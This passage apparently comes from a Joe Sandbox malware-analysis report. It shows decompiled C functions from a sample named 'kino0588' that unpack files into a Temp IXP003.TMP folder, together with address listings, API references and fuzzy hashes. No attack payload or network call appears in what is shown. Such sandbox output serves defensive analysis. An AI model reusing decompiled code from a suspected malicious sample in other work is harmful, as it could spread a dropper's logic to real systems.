				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x198004; // 0x21bd9a3c
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x1991d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00194E99(_t75);
						L35:
						return E00196CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x198584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x1991e4;
						_t58 = 0x1991e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x1991e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x1991e4;
						_t30 = E00194702( &_v268, 0x1991e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0019476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00194980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E001947E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x1993f4 =  *0x1993f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x1991e4;
						_t63 = 0x1991e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x1991e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x1991e4;
						_t30 = E00194702( &_v268, 0x1991e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00194C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00194B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00194B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                                                    0x00194cd0
                                                                                                                                                                                                                                    0x00194cdb
                                                                                                                                                                                                                                    0x00194ce0
                                                                                                                                                                                                                                    0x00194ce2
                                                                                                                                                                                                                                    0x00194cee
                                                                                                                                                                                                                                    0x00194cf2
                                                                                                                                                                                                                                    0x00194d0e
                                                                                                                                                                                                                                    0x00194d0e
                                                                                                                                                                                                                                    0x00194d11
                                                                                                                                                                                                                                    0x00194e83
                                                                                                                                                                                                                                    0x00194e88
                                                                                                                                                                                                                                    0x00194e98
                                                                                                                                                                                                                                    0x00194e98
                                                                                                                                                                                                                                    0x00194d17
                                                                                                                                                                                                                                    0x00194d17
                                                                                                                                                                                                                                    0x00194d1a
                                                                                                                                                                                                                                    0x00194d2f
                                                                                                                                                                                                                                    0x00194d2f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d2f
                                                                                                                                                                                                                                    0x00194d1c
                                                                                                                                                                                                                                    0x00194d1c
                                                                                                                                                                                                                                    0x00194d1f
                                                                                                                                                                                                                                    0x00194dcb
                                                                                                                                                                                                                                    0x00194dd0
                                                                                                                                                                                                                                    0x00194dd2
                                                                                                                                                                                                                                    0x00194ddd
                                                                                                                                                                                                                                    0x00194ddd
                                                                                                                                                                                                                                    0x00194de3
                                                                                                                                                                                                                                    0x00194de8
                                                                                                                                                                                                                                    0x00194ded
                                                                                                                                                                                                                                    0x00194ded
                                                                                                                                                                                                                                    0x00194def
                                                                                                                                                                                                                                    0x00194df0
                                                                                                                                                                                                                                    0x00194df0
                                                                                                                                                                                                                                    0x00194df4
                                                                                                                                                                                                                                    0x00194df4
                                                                                                                                                                                                                                    0x00194df6
                                                                                                                                                                                                                                    0x00194df9
                                                                                                                                                                                                                                    0x00194dfc
                                                                                                                                                                                                                                    0x00194dfc
                                                                                                                                                                                                                                    0x00194dfe
                                                                                                                                                                                                                                    0x00194dff
                                                                                                                                                                                                                                    0x00194dff
                                                                                                                                                                                                                                    0x00194e03
                                                                                                                                                                                                                                    0x00194e08
                                                                                                                                                                                                                                    0x00194e0a
                                                                                                                                                                                                                                    0x00194e0f
                                                                                                                                                                                                                                    0x00194d03
                                                                                                                                                                                                                                    0x00194d03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d03
                                                                                                                                                                                                                                    0x00194e18
                                                                                                                                                                                                                                    0x00194e20
                                                                                                                                                                                                                                    0x00194e25
                                                                                                                                                                                                                                    0x00194e27
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e33
                                                                                                                                                                                                                                    0x00194e38
                                                                                                                                                                                                                                    0x00194e3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e40
                                                                                                                                                                                                                                    0x00194e51
                                                                                                                                                                                                                                    0x00194e56
                                                                                                                                                                                                                                    0x00194e5b
                                                                                                                                                                                                                                    0x00194e5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e6a
                                                                                                                                                                                                                                    0x00194e6f
                                                                                                                                                                                                                                    0x00194e71
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e77
                                                                                                                                                                                                                                    0x00194e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e7d
                                                                                                                                                                                                                                    0x00194d25
                                                                                                                                                                                                                                    0x00194d25
                                                                                                                                                                                                                                    0x00194d28
                                                                                                                                                                                                                                    0x00194d36
                                                                                                                                                                                                                                    0x00194d3b
                                                                                                                                                                                                                                    0x00194d40
                                                                                                                                                                                                                                    0x00194d40
                                                                                                                                                                                                                                    0x00194d42
                                                                                                                                                                                                                                    0x00194d43
                                                                                                                                                                                                                                    0x00194d43
                                                                                                                                                                                                                                    0x00194d47
                                                                                                                                                                                                                                    0x00194d4a
                                                                                                                                                                                                                                    0x00194d4a
                                                                                                                                                                                                                                    0x00194d4c
                                                                                                                                                                                                                                    0x00194d4f
                                                                                                                                                                                                                                    0x00194d4f
                                                                                                                                                                                                                                    0x00194d51
                                                                                                                                                                                                                                    0x00194d52
                                                                                                                                                                                                                                    0x00194d52
                                                                                                                                                                                                                                    0x00194d56
                                                                                                                                                                                                                                    0x00194d5b
                                                                                                                                                                                                                                    0x00194d5d
                                                                                                                                                                                                                                    0x00194d62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d67
                                                                                                                                                                                                                                    0x00194d6f
                                                                                                                                                                                                                                    0x00194d74
                                                                                                                                                                                                                                    0x00194d76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d7c
                                                                                                                                                                                                                                    0x00194d84
                                                                                                                                                                                                                                    0x00194d89
                                                                                                                                                                                                                                    0x00194d8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d94
                                                                                                                                                                                                                                    0x00194d99
                                                                                                                                                                                                                                    0x00194d9e
                                                                                                                                                                                                                                    0x00194da1
                                                                                                                                                                                                                                    0x00194daa
                                                                                                                                                                                                                                    0x00194daa
                                                                                                                                                                                                                                    0x00194da3
                                                                                                                                                                                                                                    0x00194da3
                                                                                                                                                                                                                                    0x00194da3
                                                                                                                                                                                                                                    0x00194db5
                                                                                                                                                                                                                                    0x00194dbb
                                                                                                                                                                                                                                    0x00194dbd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194dc3
                                                                                                                                                                                                                                    0x00194dc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194dc5
                                                                                                                                                                                                                                    0x00194dbd
                                                                                                                                                                                                                                    0x00194d2a
                                                                                                                                                                                                                                    0x00194d2a
                                                                                                                                                                                                                                    0x00194d2d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d2d
                                                                                                                                                                                                                                    0x00194cf8
                                                                                                                                                                                                                                    0x00194cfd
                                                                                                                                                                                                                                    0x00194d02
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00194DB5
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00194DDD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                    • API String ID: 3625706803-256195474
                                                                                                                                                                                                                                    • Opcode ID: 264027f27941b3f3c470f28ff1f14bf93946e18fe24e8dc8ffe207034b46de15
                                                                                                                                                                                                                                    • Instruction ID: bd479e5f6730576322e1d67244e5b17d3ac4001bcddeda325acf5e7a222b558b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 264027f27941b3f3c470f28ff1f14bf93946e18fe24e8dc8ffe207034b46de15
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A941213A2001058BCF259FB8DD44EB673E5FF65344F044669E882A7685DB31EE8BC790
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00194C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00194C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x198d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x198d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                                                    0x00194c40
                                                                                                                                                                                                                                    0x00194c4a
                                                                                                                                                                                                                                    0x00194c8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194c70
                                                                                                                                                                                                                                    0x00194c70
                                                                                                                                                                                                                                    0x00194c7e
                                                                                                                                                                                                                                    0x00194c86
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194c8a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32 ref: 00194C54
                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00194C66
                                                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00194C7E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                                                    • Opcode ID: 132bcb74f43d67d3e2b11bd4f956ecee3ac744910a0b49d756badee10b31632c
                                                                                                                                                                                                                                    • Instruction ID: c45aa7d77212b497351dff85e8d0ed6edb108757cb545861f39f602706e3cdb2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 132bcb74f43d67d3e2b11bd4f956ecee3ac744910a0b49d756badee10b31632c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF0907261120CAFAF24DFB4CC49DBB77ECEB04250B44053BA815C1150EB30D959C7A2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0019487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E0019487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0019490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                                                    0x00194880
                                                                                                                                                                                                                                    0x0019488c
                                                                                                                                                                                                                                    0x00194894
                                                                                                                                                                                                                                    0x001948a0
                                                                                                                                                                                                                                    0x001948c9
                                                                                                                                                                                                                                    0x001948ce
                                                                                                                                                                                                                                    0x001948a2
                                                                                                                                                                                                                                    0x001948a8
                                                                                                                                                                                                                                    0x001948b7
                                                                                                                                                                                                                                    0x001948bc
                                                                                                                                                                                                                                    0x001948aa
                                                                                                                                                                                                                                    0x001948ac
                                                                                                                                                                                                                                    0x001948ac
                                                                                                                                                                                                                                    0x001948a8
                                                                                                                                                                                                                                    0x001948de
                                                                                                                                                                                                                                    0x001948e7
                                                                                                                                                                                                                                    0x0019490b
                                                                                                                                                                                                                                    0x001948ee
                                                                                                                                                                                                                                    0x001948f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194902

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00194A23,?,00194F67,*MEMCAB,00008000,00000180), ref: 001948DE
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00194F67,*MEMCAB,00008000,00000180), ref: 00194902
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                    • Opcode ID: b71614adbbfb9ea31a2498488af8c51abf3d97791076bd47ef5cfe850c1be30a
                                                                                                                                                                                                                                    • Instruction ID: ccd188db88c58bff6cb503f20751c7e62f0630dcb25af713ccebf8ef933384e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b71614adbbfb9ea31a2498488af8c51abf3d97791076bd47ef5cfe850c1be30a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD0146A3E125702BF72440698C88FB7551CCB9A735F1B0335FDEAE76D2D6644C0682E0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00194AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E00194AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x19858c; // 0x268
				_t9 = E00193680(_t20);
				if( *0x1991d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x198d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x199400; // 0x56200
							_t15 = _t14 + _t25;
							 *0x199400 = _t15;
							if( *0x198184 != 0) {
								_t21 =  *0x198584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1993f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                                                    0x00194ad5
                                                                                                                                                                                                                                    0x00194adb
                                                                                                                                                                                                                                    0x00194ae7
                                                                                                                                                                                                                                    0x00194aee
                                                                                                                                                                                                                                    0x00194b05
                                                                                                                                                                                                                                    0x00194b0d
                                                                                                                                                                                                                                    0x00194b14
                                                                                                                                                                                                                                    0x00194b1a
                                                                                                                                                                                                                                    0x00194b1c
                                                                                                                                                                                                                                    0x00194b21
                                                                                                                                                                                                                                    0x00194b2a
                                                                                                                                                                                                                                    0x00194b2f
                                                                                                                                                                                                                                    0x00194b31
                                                                                                                                                                                                                                    0x00194b39
                                                                                                                                                                                                                                    0x00194b54
                                                                                                                                                                                                                                    0x00194b54
                                                                                                                                                                                                                                    0x00194b39
                                                                                                                                                                                                                                    0x00194b2f
                                                                                                                                                                                                                                    0x00194b0f
                                                                                                                                                                                                                                    0x00194b0f
                                                                                                                                                                                                                                    0x00194b0f
                                                                                                                                                                                                                                    0x00194b5e
                                                                                                                                                                                                                                    0x00194ae9
                                                                                                                                                                                                                                    0x00194aed
                                                                                                                                                                                                                                    0x00194aed

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00193680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0019369F
                                                                                                                                                                                                                                      • Part of subcall function 00193680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001936B2
                                                                                                                                                                                                                                      • Part of subcall function 00193680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001936DA
                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00194B05
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1084409-0
                                                                                                                                                                                                                                    • Opcode ID: 53ea7c6d81b9f421d94a1517fcb42bbd4ae295e1a14b9c77c5b01df681e8bf92
                                                                                                                                                                                                                                    • Instruction ID: 31c1614584c65d3bdc582192767fad68faa61f8f16689c401735839c2c3e837d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53ea7c6d81b9f421d94a1517fcb42bbd4ae295e1a14b9c77c5b01df681e8bf92
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0301B131200201ABEB148F68DC05FA67769FB44725F14832AF93A975F0CB70DC96CB81
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0019658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E0019658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x198b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x198b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E001916B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                                                    0x00196592
                                                                                                                                                                                                                                    0x00196594
                                                                                                                                                                                                                                    0x00196596
                                                                                                                                                                                                                                    0x00196598
                                                                                                                                                                                                                                    0x00196598
                                                                                                                                                                                                                                    0x0019659b
                                                                                                                                                                                                                                    0x0019659b
                                                                                                                                                                                                                                    0x0019659d
                                                                                                                                                                                                                                    0x0019659e
                                                                                                                                                                                                                                    0x001965a2
                                                                                                                                                                                                                                    0x001965a4
                                                                                                                                                                                                                                    0x001965a9
                                                                                                                                                                                                                                    0x001965b2
                                                                                                                                                                                                                                    0x001965b6
                                                                                                                                                                                                                                    0x001965ba
                                                                                                                                                                                                                                    0x001965c3
                                                                                                                                                                                                                                    0x001965c5
                                                                                                                                                                                                                                    0x001965c8
                                                                                                                                                                                                                                    0x001965c8
                                                                                                                                                                                                                                    0x001965c3
                                                                                                                                                                                                                                    0x001965c9
                                                                                                                                                                                                                                    0x001965cc
                                                                                                                                                                                                                                    0x001965d2
                                                                                                                                                                                                                                    0x001965d1
                                                                                                                                                                                                                                    0x001965d1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001965dc
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(00198B3E,00198B3F,00000001,00198B3E,-00000003,?,001960EC,00191140,?), ref: 001965BA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                                                    • Opcode ID: 29d0d67576ce1d33d6ba056a075633b839f656c5e1b8681f58f6eaef053b9ed5
                                                                                                                                                                                                                                    • Instruction ID: c0ee103f3a6a6a33d9889ac84323c82a4fcd81232d7e250e8192c5d9108f8e47
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29d0d67576ce1d33d6ba056a075633b839f656c5e1b8681f58f6eaef053b9ed5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF042325042505BFB35051D9884B76BFDD9B96390F26016FE8DEC3209CB555C46C3B4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0019621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E0019621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x198004; // 0x21bd9a3c
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0019597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E001944B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x199124 = E00196285();
					_t9 = 0;
				}
				return E00196CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
